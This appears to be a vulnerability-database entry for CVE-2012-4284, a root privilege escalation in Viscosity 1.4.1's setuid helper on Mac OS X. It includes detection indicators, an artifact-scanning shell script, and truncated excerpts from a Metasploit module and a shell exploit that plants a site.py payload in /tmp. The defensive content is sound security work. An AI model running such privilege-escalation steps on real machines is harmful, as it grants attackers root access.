CVE-2012-4284
Published 2020-01-10
Priority P279 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 69.52% (99.3th percentile)
A Privilege Escalation vulnerability exists in Viscosity 1.4.1 on Mac OS X due to a path name validation issue in the setuid-set ViscosityHelper binary, which could let a remote malicious user execute arbitrary code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sparklabs | viscosity | — | — |
Detection & IOCs (extracted from sources)
Command: find /Applications/Viscosity.app/Contents/Resources/ViscosityHelper -type f -user root -perm -4000
- Alert on symlink creation pointing to /Applications/Viscosity.app/Contents/Resources/ViscosityHelper from any directory other than the application bundle, especially /tmp.
- Detect ViscosityHelper executing with a working directory of /tmp or other writable paths; legitimate use should only run from within the Viscosity application bundle.
- Watch for os.setuid(0) / os.setgid(0) calls originating from a Python process spawned by ViscosityHelper (setuid root), indicating successful privilege escalation via the injected site.py.
- Flag chmod 6777 applied to a newly dropped executable in /tmp by a root-owned process; this is the Metasploit module's payload staging step after exploitation.
- Check for ViscosityHelper being invoked with a setuid bit (find -type f -user root -perm -4000) as part of attacker reconnaissance prior to exploitation.
- The exploit only works against Viscosity version 1.4.1 on Mac OS X; patched or newer versions are not affected.
- The Metasploit module requires an existing shell session (local access) and targets both x86 and x64 architectures; it is a local privilege escalation, not a remote exploit.
- The writable directory defaults to /tmp; defenders should note that the exploit artifacts (symlink, site.py, site.pyc, payload EXE) are left on disk unless manually cleaned.
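
The on-disk checks from the list above, as an added triage example (not taken from the page's sources or from the Metasploit module). The helper path is the one quoted on this page; the function names and the directory argument are assumptions of this example.

```shell
#!/bin/sh
# Added example: triage for the CVE-2012-4284 artifacts listed above.
# HELPER is the path quoted on this page; function names are hypothetical.
HELPER="/Applications/Viscosity.app/Contents/Resources/ViscosityHelper"

# Succeeds if $1 is a root-owned regular file with the setuid bit set
# (the same predicate as the find command quoted on the page).
helper_is_setuid_root() {
    [ -n "$(find "$1" -type f -user root -perm -4000 2>/dev/null)" ]
}

# Scan directory $1 (default /tmp) for leftovers and print one line each:
#   SYMLINK  <path>  symlink whose stored target is the helper binary
#   ARTIFACT <path>  site.py / site.pyc sitting next to such a symlink
# Returns 0 if anything was found, 1 if the directory is clean.
# Limitation: only absolute link targets equal to $2 are matched.
scan_for_artifacts() {
    dir="${1:-/tmp}"
    target="${2:-$HELPER}"
    findings=$(
        # -type l matches the link itself; readlink returns the stored
        # target, so this also works when the target is absent on this host.
        find "$dir" -type l 2>/dev/null | while IFS= read -r link; do
            [ "$(readlink "$link")" = "$target" ] || continue
            echo "SYMLINK $link"
            parent=$(dirname "$link")
            for name in site.py site.pyc; do
                if [ -e "$parent/$name" ]; then
                    echo "ARTIFACT $parent/$name"
                fi
            done
        done
    )
    [ -n "$findings" ] || return 1
    printf '%s\n' "$findings"
}
```

Run `scan_for_artifacts /tmp` on a host with Viscosity 1.4.1 installed, and `helper_is_setuid_root "$HELPER"` to confirm whether the setuid helper is present at all.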
CVSS provenance
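| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |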
No detection rules found.
Exploit-DB
Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)
exploitdb·2013-03-05
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/exploit/exe'
class Metasploit4 'Viscosity setuid-set ViscosityHelper Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The
vulnerability exists in the setuid ViscosityHelper, where an insufficient
validation of path names allows execution of arbitrary python code as root.
This module has been tested successf
Exploit-DB
Viscosity - Local Privilege Escalation
exploitdb·2012-08-13
---
#!/bin/sh
#
##########################
# Viscatory #
# #
# zx2c4 #
##########################
#
# After the hullabaloo from the Tunnelblick local root, savvy Mac users
# began defending Viscosity, another OS X VPN client. They figured, since
# they spent money on Viscosity, surely it would be better designed than
# the free open-source alternative.
#
# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
# the win. Here, the SUID helper will execute site.py in its enclosing
# folder. A simple symlink, and we have root.
#
# greets to jono
#
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh
echo "[+] Crafting payload."
mkdir -p -v /tmp/pwn
cat > /tmp/pwn/site.py <<_EOF
import os
print "[+] Cleaning up."
os.system("rm -rvf
Metasploit
Viscosity setuid-set ViscosityHelper Privilege Escalation
metasploit
This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.
No writeups or analysis indexed.
- http://www.exploit-db.com/exploits/24579
- http://www.securityfocus.com/bid/55002
- https://packetstormsecurity.com/files/120643/Viscosity-setuid-set-ViscosityHelper-Privilege-Escalation.html
- https://www.sparklabs.com/viscosity/releasenotes/mac/